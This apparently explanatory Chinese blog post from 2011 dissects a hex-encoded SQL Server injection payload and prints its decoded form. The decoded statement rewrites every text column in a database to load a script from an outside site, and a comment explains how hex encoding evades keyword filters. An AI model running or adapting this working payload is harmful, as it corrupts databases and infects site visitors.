`
zhuyx808
  • 浏览: 122971 次
  • 性别: Icon_minigender_1
  • 来自: 快来看~天上米有灰机
社区版块
存档分类
最新评论

16进制的SQL 注入

阅读更多

通过post,get,cookies方式注入,注入内容如下:

DeCLaRE @S NvArCHaR(4000);SeT @S=CaSt(0x4400650063006C0061007200650020004000540020005600610072006300680061007200280032

003500350029002C004000430020005600610072006300680061007200280032003500350029002000440065

0063006C0061007200650020005400610062006C0065005F0043007500720073006F00720020004300750072

0073006F007200200046006F0072002000530065006C00650063007400200041002E004E0061006D0065002C

0042002E004E0061006D0065002000460072006F006D0020005300790073006F0062006A0065006300740073

00200041002C0053007900730063006F006C0075006D006E0073002000420020005700680065007200650020

0041002E00490064003D0042002E0049006400200041006E006400200041002E00580074007900700065003D

00270075002700200041006E0064002000280042002E00580074007900700065003D003900390020004F00720

0200042002E00580074007900700065003D003300350020004F007200200042002E0058007400790070006500

3D0032003300310020004F007200200042002E00580074007900700065003D00310036003700290020004F007

00065006E0020005400610062006C0065005F0043007500720073006F00720020004600650074006300680020

004E006500780074002000460072006F006D00200020005400610062006C0065005F0043007500720073006F0

07200200049006E0074006F002000400054002C004000430020005700680069006C0065002800400040004600

65007400630068005F005300740061007400750073003D0030002900200042006500670069006E002000450078

00650063002800270075007000640061007400650020005B0027002B00400054002B0027005D00200053006500

740020005B0027002B00400043002B0027005D003D0052007400720069006D00280043006F006E00760065007

2007400280056006100720063006800610072002800380030003000300029002C005B0027002B00400043002B0

027005D00290029002B00270027003C0073006300720069007000740020007300720063003D006800740074007

0003A002F002F007A003300360030002E006E00650074003E003C002F007300630072006900700074003E00270

02700270029004600650074006300680020004E006500780074002000460072006F006D00200020005400610062

006C0065005F0043007500720073006F007200200049006E0074006F002000400054002C004000430020004500

6E006400200043006C006F007300650020005400610062006C0065005F0043007500720073006F007200200044

00650061006C006C006F00630061007400650020005400610062006C0065005F0043007500720073006F007200 aS NvArChAR(4000));ExEc(@S);--;



在查询分析器里转换的sql语句如下:


Declare @T Varchar(255),@C Varchar(255)
Declare Table_Cursor Cursor For Select A.Name,B.Name From Sysobjects A,Syscolumns B Where A.Id=B.Id And A.Xtype='u' And (B.Xtype=99 Or B.Xtype=35 Or B.Xtype=231 Or B.Xtype=167)

Open Table_Cursor

    Fetch Next From  Table_Cursor  Into @T,@C
  
    While(@@Fetch_Status=0)
    Begin
        Exec('update ['+@T+'] Set ['+@C+']=Rtrim(Convert(Varchar(8000),['+@C+']))+''<script src=http://z360.net></script>''')Fetch Next From  Table_Cursor Into @T,@C
    End
Close Table_Cursor

Deallocate Table_Cursor

 

分享到:
评论
2 楼 zhuyx808 2011-02-10  
其实上面一段代码本身就是一个sql语句,为了绕过明文(select update delete)的限制,他们就把代码转换为16进制,而exec可以执行这个语句。你只需要在exec前加上print @s 就可以看到这个语句了
1 楼 iwlk 2011-01-08  
不知在“查询分析器里转换”中如何转换的? 我没有找到~ 忘指点一二~

相关推荐

    SQL注入16进制转换工具

    16进制转换在SQL注入中扮演着重要角色,因为某些特殊字符在转成16进制后可以绕过过滤机制,使得攻击更加隐蔽。 16进制转换工具是为了帮助安全研究人员或开发人员理解和测试SQL注入漏洞而设计的。这类工具能够将字符...

    16进制转换工具 SQL注入学习小工具 学习

    这个名为"16进制转换工具 SQL注入学习小工具 学习"的压缩包显然是为那些想要深入理解SQL注入攻击和提升16进制转换能力的学习者准备的。下面我们将详细探讨这两个关键知识点。 首先,16进制(Hexadecimal)是一种逢...

    SQL注入学习帮助小工具 16进制转换工具

    本工具"SQL注入学习帮助小工具 16进制转换工具"正是针对这一主题设计的,旨在帮助学习者理解和防范这种攻击。 在进行SQL注入攻击时,16进制编码常被用来绕过过滤机制。因为许多过滤系统可能不会检测到16进制形式的...

    SQL注入_16进制转换工具

    在这个主题中,我们将深入探讨SQL注入及其与16进制转换工具的关系。 在描述中提到的“SQL注入_16进制转换工具”是用于学习如何识别和利用SQL注入漏洞的工具。这种工具通常用于演示目的,帮助安全研究人员理解攻击者...

    SQL SERVER 注入小工具-进制转换

    可对SQL注入时,进行代码变异注入。这个小工具可对SQL语句进行URL以及16进制的转换。 比如:select * from admin 将成为:0x530065006C0065006300740020002A002000460072006F006D002000610064006D0069006E00 用法: ...

    javascript实现的字符串与十六进制表示字符串相互转换方法

    之所以写这个,是因为发现SQL注入和XSS中经常利用十六进制表示的字符串,比如 SELECT CONCAT(0x68656c6c6f); 得到的是hello &lt;!DOCTYPE html&gt; &lt;html&gt; &lt;head&gt; &lt;title&gt;Hex-Char Bi-Converter&...

    ASP下终结SQL注入攻击.pdf

    【ASP下终结SQL注入攻击】 随着互联网技术的发展,ASP(Active Server Pages)和SQL(Structured Query Language)成为了构建动态网站的常用技术。然而,随之而来的是SQL注入攻击的威胁,这种攻击方式通过输入恶意...

    zzzphp1.7.4&1.7.5到处都是sql注入.pdf

    尝试使用空格或16进制编码的制表符(如`09`)会导致HTTP 400错误。 2. 由于使用`explode('/', $s)`,所以输入不能包含斜线(`/`),这排除了使用斜线代替空格的方法。 3. `$last = str_replace('&', '=', array_pop...

    .net 防SQL注入实用代码案例

    要防止SQL注入主要是要在查询字符串(QueryString),表单数据(PostData)以及Cookie甚至HTTP报头(Header)中防止掉一些特殊字符(单引号,分号)以及SQL语言的关键字,以及防止他们使用16进制编码。

    vb 16进制编码解码

    根据给定的文件信息,我们可以总结出以下关于VB(Visual Basic)中16进制编码解码的相关知识点: ### 1. 概述 在计算机编程领域,编码和解码是处理文本数据的重要手段之一。十六进制编码常用于表示二进制数据,...

    Web应用安全:使用SQL注入攻击篡改数据实验.doc

    【Web应用安全:SQL注入攻击篡改数据】 SQL注入攻击是一种常见的网络安全威胁,攻击者通过在Web应用程序的输入字段中插入恶意SQL代码,以获取未经授权的数据访问或控制系统。本实验旨在让学生了解并实践SQL注入的...

    java socket 通信

    此外,对输入数据进行验证和过滤,防止SQL注入等攻击也很重要。 综上所述,"java socket通信"不仅涉及基础的网络编程,还涵盖了数据处理、数据库操作、并发处理等多个方面,是Java开发中的一个重要实践领域。通过...

    sql注入之联合查询,最详细的CMS联合查询过程!!!!

    攻击者尝试找出存储用户信息的表名,通过`table_name`字段进行筛选,并利用`hex()`和`unhex()`函数进行16进制编码和解码,以应对可能的字符限制。 【步骤5:限定表名】当找到可能的表名如`CHARACTER_SETS`时,通过`...

    拒绝SQL数据库注入.pdf

    然而,由于注入代码可能被转换为16进制或2进制形式,并且某些网站的源代码不易阅读,这种方法可能难以完全解决问题。 2. **后台数据过滤**:在服务器端对数据库查询的结果进行过滤,清理已注入的恶意代码,并添加...

    Web应用安全:使用SQL注入绕过方法文本.docx

    ### Web应用安全:深入解析SQL注入绕过方法 #### 概述 随着互联网技术的不断发展,Web应用程序成为了人们日常生活中不可或缺的一部分。然而,这也让Web应用程序成为黑客攻击的主要目标之一。其中,SQL注入是最常见...

    关于SQL注入中文件读写的方法总结

    为了隐藏路径,还可以使用16进制的方式来表示路径。例如,使用SELECT load_file('c:/boot.ini')或者SELECT load_file(0x633a2f626f6f742e696e69)来读取c:\boot.ini文件的内容。此外,还可以通过UNC路径(Universal ...

    php is_numberic函数造成的SQL注入漏洞

    例如,如果攻击者构造一个16进制的字符串"0x31206f722031",它在转换为十进制后仍然是"1 or 1",这在SQL查询中将导致不受控制的条件满足,从而可能引发二次注入。 三、解决方案 1. **参数化查询/预编译语句**:...

    C#实现登陆程序(MD5加密和SQL存储过程防注入攻击)

    4. 将得到的哈希值转化为16进制字符串,便于存储和比较。 接下来,我们讨论SQL存储过程。存储过程是在数据库服务器上预编译的SQL语句集合,可以在应用程序中多次调用,提高性能并降低网络通信量。在登录程序中,...

    SQL盲注medium.pdf

    使用mysql_real_escape_string函数可以对单引号进行转义,需要将字段名转换为16进制进行绕过。 知识点:mysql_real_escape_string函数、数据表字段猜测。 八、结语 本文档讲解了SQL盲注的技术,包括猜测数据库名...

Global site tag (gtag.js) - Google Analytics